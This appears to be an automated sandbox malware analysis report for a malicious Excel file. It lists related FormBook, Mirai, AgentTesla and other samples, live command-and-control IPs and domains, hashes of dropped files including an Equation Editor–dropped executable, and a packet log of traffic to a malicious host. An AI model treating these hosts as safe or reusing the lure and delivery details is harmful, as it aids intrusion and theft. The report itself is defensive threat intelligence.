www.sqlite.org | SOA-INV0892024.xla.xlsx | malicious | FormBook | 45.33.6.223
www.sqlite.org | New PO-RFQ14101524.xla.xlsx | malicious | FormBook | 45.33.6.223
www.sqlite.org | Thermo Fisher RFQ_TFS-1702.xls | malicious | FormBook, GuLoader | 45.33.6.223
www.sqlite.org | BILL OF LADDING.exe | malicious | FormBook | 45.33.6.223
www.sqlite.org | FvYlbhvZrZ.rtf | malicious | FormBook | 45.33.6.223
www.sqlite.org | SecuriteInfo.com.Win32.SuspectCrc.23106.21095.xlsx | malicious | FormBook | 45.33.6.223
www.sqlite.org | LgzpILNkS2.exe | malicious | FormBook | 45.33.6.223
www.sqlite.org | ncOLm62YLB.exe | malicious | FormBook | 45.33.6.223
www.75e296qdx.top | request-BPp -RFQ 0975432.exe | malicious | PureLog Stealer | 185.196.10.234
www.75e296qdx.top | IND24072113_1.xlsx | malicious | Unknown | 185.196.10.234
www.75e296qdx.top | NOXGUARD AUS 40 UREA__912001_NOR_EN - MSDS.exe | malicious | Unknown | 185.196.10.234
timurtrading.my | IND24072113_1.xlsx | malicious | Unknown | 192.3.255.145
timurtrading.my | Request For Quotation- PO22719.xlsx | malicious | FormBook | 134.255.233.189
Match | Associated Sample Name / URL | Detection | Threat Name | Context
DIGITALOCEAN-ASNUS | https://sites.google.com/view/hffgshfgsqfgsqf/home | malicious | Unknown | 138.68.75.10
DIGITALOCEAN-ASNUS | la.bot.arm7.elf | malicious | Unknown | 103.253.147.242
DIGITALOCEAN-ASNUS | la.bot.arm7.elf | malicious | Unknown | 103.253.147.242
DIGITALOCEAN-ASNUS | https://mlbmajorlossbuilders.hbportal.co/flow/66fdd3a6c031cc001f728831/view?hash=54079a777636a614d8d961b5b9a96a5f | malicious | Unknown | 159.89.102.253
DIGITALOCEAN-ASNUS | request-BPp -RFQ 0975432.exe | malicious | PureLog Stealer | 167.99.212.139
DIGITALOCEAN-ASNUS | IND24072113_1.xlsx | malicious | Unknown | 167.172.133.32
DIGITALOCEAN-ASNUS | SecuriteInfo.com.Win32.CrypterX-gen.19670.22903.exe | malicious | Lokibot | 104.248.205.66
DIGITALOCEAN-ASNUS | eJeQNTcb4A.exe | malicious | Metasploit | 188.166.177.132
DIGITALOCEAN-ASNUS | m8ufsTLLOU.exe | malicious | Metasploit | 188.166.177.132
DIGITALOCEAN-ASNUS | VInxSo1xrN.exe | malicious | Metasploit | 188.166.177.132
AS-COLOCROSSINGUS | PaymentXConfirmationXcopy.xls | malicious | Snake Keylogger | 172.245.123.45
AS-COLOCROSSINGUS | la.bot.arm7.elf | malicious | Unknown | 192.3.165.37
AS-COLOCROSSINGUS | Payment Advice080.xls | malicious | Unknown | 192.3.176.141
AS-COLOCROSSINGUS | 76.xlam.xlsx | malicious | AgentTesla | 198.46.178.134
AS-COLOCROSSINGUS | Purchase order.xls | malicious | Unknown | 192.3.176.141
AS-COLOCROSSINGUS | Proforma_Inv07.xls | malicious | Unknown | 198.144.178.173
AS-COLOCROSSINGUS | Thermo Fisher RFQ_TFS-1702.xls | malicious | Unknown | 192.3.101.157
AS-COLOCROSSINGUS | PO-1021202416777 PNG2023-W111.xls | malicious | Unknown | 23.94.171.157
AS-COLOCROSSINGUS | SUNLIGHT ORDER.xls | malicious | Unknown | 172.245.123.45
AS-COLOCROSSINGUS | IND24072113_1.xlsx | malicious | Unknown | 192.3.255.145
TANDEMUS | http://manatoki463.net | malicious | Unknown | 15.197.193.217
TANDEMUS | la.bot.mips.elf | malicious | Unknown | 15.196.223.166
TANDEMUS | la.bot.sparc.elf | malicious | Unknown | 128.88.14.231
TANDEMUS | ekte.exe | malicious | FormBook | 15.197.148.33
TANDEMUS | IND24072113_1.xlsx | malicious | Unknown | 15.197.148.33
TANDEMUS | la.bot.sh4.elf | malicious | Unknown | 155.208.85.234
TANDEMUS | spc.elf | malicious | Mirai | 16.252.73.149
TANDEMUS | sh4.elf | malicious | Mirai | 15.198.96.79
TANDEMUS | na.elf | malicious | Mirai | 16.252.73.153
TANDEMUS | DHL AWB TRACKING DETAILS.exe | malicious | FormBook | 15.197.204.56
LINODE-APLinodeLLCUS | PO1268931024 - Bank Slip.exe | malicious | PureLog Stealer | 178.79.184.196
LINODE-APLinodeLLCUS | meow.arm.elf | malicious | Unknown | 172.105.120.101
LINODE-APLinodeLLCUS | meow.arm7.elf | malicious | Unknown | 172.105.109.175
                                                            ekte.exeGet hashmaliciousFormBookBrowse
                                                            • 45.33.6.223
                                                            IND24072113_1.xlsxGet hashmaliciousUnknownBrowse
                                                            • 45.33.6.223
                                                            la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                                                            • 172.104.125.52
                                                            sparc.elfGet hashmaliciousUnknownBrowse
                                                            • 103.3.63.184
                                                            la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                            • 198.74.57.190
                                                            SOA-INV0892024.xla.xlsxGet hashmaliciousFormBookBrowse
                                                            • 45.33.6.223
                                                            arm.elfGet hashmaliciousMiraiBrowse
                                                            • 45.79.58.115
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
7dcce5b76c8b17472d024758970a406b | PaymentXConfirmationXcopy.xls | Get hash | malicious | Snake Keylogger | Browse | 192.3.255.145
 | Payment Advice080.xls | Get hash | malicious | Unknown | Browse | 192.3.255.145
 | Purchase order.xls | Get hash | malicious | Unknown | Browse | 192.3.255.145
 | Payment Advice080.xls | Get hash | malicious | Unknown | Browse | 192.3.255.145
 | Purchase order.xls | Get hash | malicious | Unknown | Browse | 192.3.255.145
 | Document.xla.xlsx | Get hash | malicious | Unknown | Browse | 192.3.255.145
 | Proforma_Inv07.xls | Get hash | malicious | Unknown | Browse | 192.3.255.145
 | Thermo Fisher RFQ_TFS-1702.xls | Get hash | malicious | Unknown | Browse | 192.3.255.145
 | PO-1021202416777 PNG2023-W111.xls | Get hash | malicious | Unknown | Browse | 192.3.255.145
 | Document.xla.xlsx | Get hash | malicious | Unknown | Browse | 192.3.255.145
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\AppData\Local\Temp\sqlite3.dll | IND24072113_1.xlsx | Get hash | malicious | Unknown | Browse | 
 | ORDER_23CA0604.xls | Get hash | malicious | FormBook | Browse | 
 | ref_62334_DUBIA_RE_Order_Request_-_1712.xls | Get hash | malicious | FormBook | Browse | 
 | OrderP.O_R477304.xls | Get hash | malicious | FormBook | Browse | 
 | SecuriteInfo.com.Exploit.CVE-2018-0798.4.23192.12875.rtf | Get hash | malicious | FormBook | Browse | 
 | 220062.xls | Get hash | malicious | FormBook | Browse | 
 | P.O 10102022.xlsx | Get hash | malicious | FormBook | Browse | 
                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):162
                                                                          Entropy (8bit):4.43530643106624
                                                                          Encrypted:false
                                                                          SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGu:q43tISl6kXiMIWSU6XlI5LP8IpfGu
                                                                          MD5:4F8E702CC244EC5D4DE32740C0ECBD97
                                                                          SHA1:3ADB1F02D5B6054DE0046E367C1D687B6CDF7AFF
                                                                          SHA-256:9E17CB15DD75BBBD5DBB984EDA674863C3B10AB72613CF8A39A00C3E11A8492A
                                                                          SHA-512:21047FEA5269FEE75A2A187AA09316519E35068CB2F2F76CFAF371E5224445E9D5C98497BD76FB9608D2B73E9DAC1A3F5BFADFDC4623C479D53ECF93D81D3C9F
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..
                                                                          Process:C:\Windows\SysWOW64\msinfo32.exe
                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                          Category:dropped
                                                                          Size (bytes):566647
                                                                          Entropy (8bit):7.998937651445336
                                                                          Encrypted:true
                                                                          SSDEEP:12288:YdF1iYiigTkuYEbb4WR54x2Si2Mxmo9fjchdiASRjVt0sNBqpKQx:YdGYii0bbKxe2MzfjxASl0EqoQx
                                                                          MD5:5E2D04CB2FAE4E811CA35675C472F5FC
                                                                          SHA1:6E2359F8E81F1A1122D1FB50B064878F2AAEFC68
                                                                          SHA-256:DD46A298AB90CA9BA8A1F633F20ABE2DCB805596B5AA68DCB84CCE99E3A56BE1
                                                                          SHA-512:53C8701768EE4A43A6B2095AF00AA5F2C53445021A91D3567D02CF8157C7B7C4E629C5C70BB24697D365A7C41C791AF0C68B511AB3CF5F356D9D929618421D05
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:PK..........WT................sqlite3.defUT....7.b.7.bux.................&.@.....\....J..N.$$.@f...>.pE7 g.../.z.o...._...........+s|..r......N..C....;........M7...P.n5..j...-..........Q.P.0J=...o....S&.........s.Me.J.#...*.[.4l....#.....j....?...../..a|9.a....."}pE..l.I........5lL... @'v.}......_N...W..M.<_`. ..d3..(.%.?z..;.n...4$......p7....Q..._.%..!.L.]..I..Sg..>..'.Hn.4.J..s.Y/..5.....s..-;n-...t..B.$.}.........9.9...8B..A.d.B.N.g>_.P......oFb..v>.}......$....3..{...;3hJ.T.j..aO.f.U.' Q;..+..(..,......c-..'......7..!!'G.X...xK.i?pv<..J-b...0.9.....jd.....+...$[@wj...z.y..[..d.o..h....h.hU8c!(=..;/.4....#Nl.."=j...F.....@v.Pw2...U);.AV.%w.kC$../.".(3`.8....A..0.}dk..n.....i6..n....Pd.Lz&....}_...zY,r{......'48.t./...A..u.?j.y...^..9.c.O...hI`.z.......(...A ...b8....iLM'ZC...VJ$.~....&C.a..?.;j..C....1H.....n........}......[KI.)9.d6..6..F?D..R..(..&....Q.2.;....w&...!:}...A$.5..=...d....a.^K.[l...C.Dd..<.#...$.{...........?.P,.!...
                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1320269
                                                                          Entropy (8bit):7.508333305248267
                                                                          Encrypted:false
                                                                          SSDEEP:24576:ffmMv6Ckr7Mny5QLQxkO/ur7UdTR49zWzYFiB/XVRK5CFPWr:f3v+7/5QL4kmu/URkzeqa/l4Ca
                                                                          MD5:A6BF416D4380AEA9DAF376E06878F0F7
                                                                          SHA1:3811D4CDD2723B0744303D7E13AE184CAF9ADEDD
                                                                          SHA-256:8B7DA48C591F5FF86724C1E89E883F95ED3E429C3FD39B270EA6D95155B9AC1B
                                                                          SHA-512:08417513747F2821DD7F458CE9E61169DAE29D0155EBF014FAF2E0C4AC76A081293AD5A3B3B11BC7426F1153E6FDEFDB12A682CF40821880BB0F7930AA0B7746
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i.i.i..9.k.`.:.w.`.,...`.+.P.N%.c.N%.H.i.d.`. ./.w.:.k.w.;.h.i.8.h.`.>.h.Richi.........................PE..L.....K..........#..................c....... ....@..........................P......5!........@.......@.....................<...T.................................................................................... ..@............................text............................... ..`.rdata..\.... ......................@..@.data............h..................@....rsrc................H..............@..@................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Windows\SysWOW64\msinfo32.exe
                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                          Category:dropped
                                                                          Size (bytes):566647
                                                                          Entropy (8bit):7.998937651445336
                                                                          Encrypted:true
                                                                          SSDEEP:12288:YdF1iYiigTkuYEbb4WR54x2Si2Mxmo9fjchdiASRjVt0sNBqpKQx:YdGYii0bbKxe2MzfjxASl0EqoQx
                                                                          MD5:5E2D04CB2FAE4E811CA35675C472F5FC
                                                                          SHA1:6E2359F8E81F1A1122D1FB50B064878F2AAEFC68
                                                                          SHA-256:DD46A298AB90CA9BA8A1F633F20ABE2DCB805596B5AA68DCB84CCE99E3A56BE1
                                                                          SHA-512:53C8701768EE4A43A6B2095AF00AA5F2C53445021A91D3567D02CF8157C7B7C4E629C5C70BB24697D365A7C41C791AF0C68B511AB3CF5F356D9D929618421D05
                                                                          Malicious:false
                                                                          Preview:PK..........WT................sqlite3.defUT....7.b.7.bux.................&.@.....\....J..N.$$.@f...>.pE7 g.../.z.o...._...........+s|..r......N..C....;........M7...P.n5..j...-..........Q.P.0J=...o....S&.........s.Me.J.#...*.[.4l....#.....j....?...../..a|9.a....."}pE..l.I........5lL... @'v.}......_N...W..M.<_`. ..d3..(.%.?z..;.n...4$......p7....Q..._.%..!.L.]..I..Sg..>..'.Hn.4.J..s.Y/..5.....s..-;n-...t..B.$.}.........9.9...8B..A.d.B.N.g>_.P......oFb..v>.}......$....3..{...;3hJ.T.j..aO.f.U.' Q;..+..(..,......c-..'......7..!!'G.X...xK.i?pv<..J-b...0.9.....jd.....+...$[@wj...z.y..[..d.o..h....h.hU8c!(=..;/.4....#Nl.."=j...F.....@v.Pw2...U);.AV.%w.kC$../.".(3`.8....A..0.}dk..n.....i6..n....Pd.Lz&....}_...zY,r{......'48.t./...A..u.?j.y...^..9.c.O...hI`.z.......(...A ...b8....iLM'ZC...VJ$.~....&C.a..?.;j..C....1H.....n........}......[KI.)9.d6..6..F?D..R..(..&....Q.2.;....w&...!:}...A$.5..=...d....a.^K.[l...C.Dd..<.#...$.{...........?.P,.!...
                                                                          Process:C:\Windows\SysWOW64\msinfo32.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                                          Category:dropped
                                                                          Size (bytes):77824
                                                                          Entropy (8bit):1.133993246026424
                                                                          Encrypted:false
                                                                          SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                                          MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                                          SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                                          SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                                          SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                                          Malicious:false
                                                                          Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Roaming\word.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):287744
                                                                          Entropy (8bit):7.992991490644983
                                                                          Encrypted:true
                                                                          SSDEEP:6144:RjLrn0zC2aY7/LeOqqs9MzQFM3+jYxn7F43p2tJBO:RjLrn0zCvYO/qkbtYNF4IJ4
                                                                          MD5:376ABA9FE07564E445CC3CAFB0B4D7E0
                                                                          SHA1:0DBF398D4A54DBDD8F43F81CE71F6815F29EFA99
                                                                          SHA-256:2BE36FDF91F7C66749EB1F3F08209ED177E58AA3E9A9757CA139A624B031AB4E
                                                                          SHA-512:D8245CEAE9726C9EDC1154175A06BD4AD009DAF74B539522D107D06AF3C7CE2A6A93249AF0DD91D1B160C9B5F405E1248DDD9B42FDB7D8A117262A67F1A5DD1F
                                                                          Malicious:false
                                                                          Preview:|h...S0D3..0.....0G..l:9..3S0D3QVD912NE3S0D3QVD912NE3S0D.QVD7..@E.Z.e.P...eZ'6.#B+T#7).RS +\'.&Vq$1W.[ ew.cd^>2!.<?Da3S0D3QV=88.s%T..$T.k$^.(...iP#.K....R).)....11.kXQ&xS4.D3QVD912..3S|E2Q.3xj2NE3S0D3.VF8:3EE3.4D3QVD912NE'S0D#QVDI52NEsS0T3QVF914NE3S0D3WVD912NE3#4D3SVD912NG3..D3AVD)12NE#S0T3QVD91"NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NkG6H03QV@h52NU3S0.7QVT912NE3S0D3QVD9.2N%3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD
                                                                          Process:C:\Windows\SysWOW64\msinfo32.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):7366
                                                                          Entropy (8bit):4.351996663263546
                                                                          Encrypted:false
                                                                          SSDEEP:96:kCcuN/mXU+anR+7GgbXgXdMcAM3K4tGvAF+GEhwIEVtvaENwzY0aR:kA/B+7GgbQbKWrF+GEeJvaENwzcR
                                                                          MD5:A199F89960429326AE36F645FFC387AF
                                                                          SHA1:85E4281D0F95AA75611F2946FB4212A70F7E7B75
                                                                          SHA-256:35C648FA355503C4B6608C4D482BF8C0AE34AF33D70F08172ECD43816AAAB733
                                                                          SHA-512:48862ACDCFBA121EB52E903671731E010912CBD4B2B6F45D0E16F7E6A3BA77862695969AC7856801605689466BC7AD2E8960F227AECFF3FCE0106B4C999FBC9B
                                                                          Malicious:false
                                                                          Preview:EXPORTS.sqlite3_aggregate_context.sqlite3_aggregate_count.sqlite3_auto_extension.sqlite3_autovacuum_pages.sqlite3_backup_finish.sqlite3_backup_init.sqlite3_backup_pagecount.sqlite3_backup_remaining.sqlite3_backup_step.sqlite3_bind_blob.sqlite3_bind_blob64.sqlite3_bind_double.sqlite3_bind_int.sqlite3_bind_int64.sqlite3_bind_null.sqlite3_bind_parameter_count.sqlite3_bind_parameter_index.sqlite3_bind_parameter_name.sqlite3_bind_pointer.sqlite3_bind_text.sqlite3_bind_text16.sqlite3_bind_text64.sqlite3_bind_value.sqlite3_bind_zeroblob.sqlite3_bind_zeroblob64.sqlite3_blob_bytes.sqlite3_blob_close.sqlite3_blob_open.sqlite3_blob_read.sqlite3_blob_reopen.sqlite3_blob_write.sqlite3_busy_handler.sqlite3_busy_timeout.sqlite3_cancel_auto_extension.sqlite3changegroup_add.sqlite3changegroup_add_strm.sqlite3changegroup_delete.sqlite3changegroup_new.sqlite3changegroup_output.sqlite3changegroup_output_strm.sqlite3_changes.sqlite3_changes64.sqlite3changeset_apply.sqlite3changeset_apply_strm.sqlite3change
                                                                          Process:C:\Windows\SysWOW64\msinfo32.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1098199
                                                                          Entropy (8bit):6.505076426522055
                                                                          Encrypted:false
                                                                          SSDEEP:24576:chlbC7QSGIt3dr8mVpn1MRRlnCSLvcdLpi:cnZoNrLn1M3lnV4E
                                                                          MD5:F1E5F58F9EB43ECEC773ACBDB410B888
                                                                          SHA1:F1B8076B0BBDE696694BBC0AB259A77893839464
                                                                          SHA-256:A15FD84EE61B54C92BB099DFB78226548F43D550C67FB6ADF4CCE3D064AB1C14
                                                                          SHA-512:0AFF96430DD99BB227285FEFC258014C301F85216C84E40F45702D26CDD7E77261A41FD3811D686F5FB2EE363CC651A014E8FFA339384004CECE645A36486456
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Joe Sandbox View:
                                                                          • Filename: IND24072113_1.xlsx, Detection: malicious, Browse
                                                                          • Filename: ORDER_23CA0604.xls, Detection: malicious, Browse
                                                                          • Filename: ref_62334_DUBIA_RE_Order_Request_-_1712.xls, Detection: malicious, Browse
                                                                          • Filename: OrderP.O_R477304.xls, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.Exploit.CVE-2018-0798.4.23192.12875.rtf, Detection: malicious, Browse
                                                                          • Filename: 220062.xls, Detection: malicious, Browse
                                                                          • Filename: P.O 10102022.xlsx, Detection: malicious, Browse
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7.b.r.........!......................... .....a................................l......... .........................n*................................... ...;...................................................................................text...............................`.P`.data...|'... ...(..................@.`..rdata...C...P...D...8..............@.`@.bss....(.............................`..edata..n*.......,...|..............@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...............................@.0..reloc...;... ...<..................@.0B/4......8....`......................@.@B/19.....R....p......................@..B/31.....]'...@...(..................@..B/45......-...p......................@..B/57.....\............"..............@.0B/70.....#...............
                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1320269
                                                                          Entropy (8bit):7.508333305248267
                                                                          Encrypted:false
                                                                          SSDEEP:24576:ffmMv6Ckr7Mny5QLQxkO/ur7UdTR49zWzYFiB/XVRK5CFPWr:f3v+7/5QL4kmu/URkzeqa/l4Ca
                                                                          MD5:A6BF416D4380AEA9DAF376E06878F0F7
                                                                          SHA1:3811D4CDD2723B0744303D7E13AE184CAF9ADEDD
                                                                          SHA-256:8B7DA48C591F5FF86724C1E89E883F95ED3E429C3FD39B270EA6D95155B9AC1B
                                                                          SHA-512:08417513747F2821DD7F458CE9E61169DAE29D0155EBF014FAF2E0C4AC76A081293AD5A3B3B11BC7426F1153E6FDEFDB12A682CF40821880BB0F7930AA0B7746
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i.i.i..9.k.`.:.w.`.,...`.+.P.N%.c.N%.H.i.d.`. ./.w.:.k.w.;.h.i.8.h.`.>.h.Richi.........................PE..L.....K..........#..................c....... ....@..........................P......5!........@.......@.....................<...T.................................................................................... ..@............................text............................... ..`.rdata..\.... ......................@..@.data............h..................@....rsrc................H..............@..@................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):165
                                                                          Entropy (8bit):1.4377382811115937
                                                                          Encrypted:false
                                                                          SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                          MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                          SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                          SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                          SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                          Malicious:true
                                                                          Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
File type: Microsoft Excel 2007+
Entropy (8bit): 7.9983803277408425
TrID:
• Excel Microsoft Office Open XML Format document (35004/1) 81.40%
• ZIP compressed archive (8000/1) 18.60%
File name: IND24072113.xlsx
File size: 1'431'575 bytes
MD5: 22d0a21eddbb4653bd17a2661616c83d
SHA1: 2e63451d91b759c83f5ade2a461a8db913d9a06d
SHA256: 7aa5dd9473b19ca966efa3964d26773ea6d5c479debffd5d9233b16b05324d67
SHA512: ee3942dfd3fd551cb393c38017bf3d7c5bc5921ad7cccda9798b2d239d198c1f36ed8b5a1bc0fe5beb4fc3bb0be8769f0bba327eeca6125cfe615da538b2872f
SSDEEP: 24576:RylCurmCuftwBVc38knlrn3I7Zg3bxbtVjeYphob7nQRcT:Rp66au8knpmm3bdfphJi
TLSH: B66533ECFD03C4FE2F306A599556949AFBFAE6D9C84E0E6C3018D641EE125AC4750B8C
Icon Hash: 2562ab89a7b7bfbf
Document Type: OpenXML
Number of OLE Files: 1
Has Summary Info:
Application Name:
Encrypted Document: False
Contains Word Document Stream: False
Contains Workbook/Book Stream: True
Contains PowerPoint Document Stream: False
Contains Visio Document Stream: False
Contains ObjectPool Stream: False
Flash Objects Count: 0
Contains VBA Macros: False
Author: ctrl
Last Saved By: ctrl
Create Time: 2022-11-18T02:05:27Z
Last Saved Time: 2022-11-18T02:07:12Z
Creating Application: Microsoft Excel
Security: 0
Thumbnail Scaling Desired: false
Contains Dirty Links: false
Shared Document: false
Changed Hyperlinks: false
Application Version: 12.0000
General
Stream Path: \x1OlE10NaTivE
CLSID:
File Type: data
Stream Size: 1637039
Entropy: 7.5109847962190495
Base64 Encoded: True
General
Stream Path: SUXanMZqHIlXc
CLSID:
File Type: empty
Stream Size: 0
Entropy: 0.0
Base64 Encoded: False
Data ASCII:
Data Raw:
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                          Oct 22, 2024 15:00:48.711307049 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.711330891 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.711338043 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.711360931 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.711384058 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.756072044 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.756127119 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.756143093 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.756159067 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.756176949 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.756201982 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.756361961 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.756443024 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.756484985 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.756503105 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.756510019 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.756534100 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.756582975 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.756872892 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.756913900 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.756944895 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.756952047 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.756968021 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.756989956 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.757747889 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.819940090 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.819987059 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.820012093 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.820028067 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.820040941 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.820074081 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.820171118 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.820357084 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.820403099 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.820417881 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.820424080 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.820446968 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.820472002 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.820871115 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.820924997 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.820930958 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.820938110 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.820981979 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.821013927 CEST49162443192.168.2.22192.3.255.145
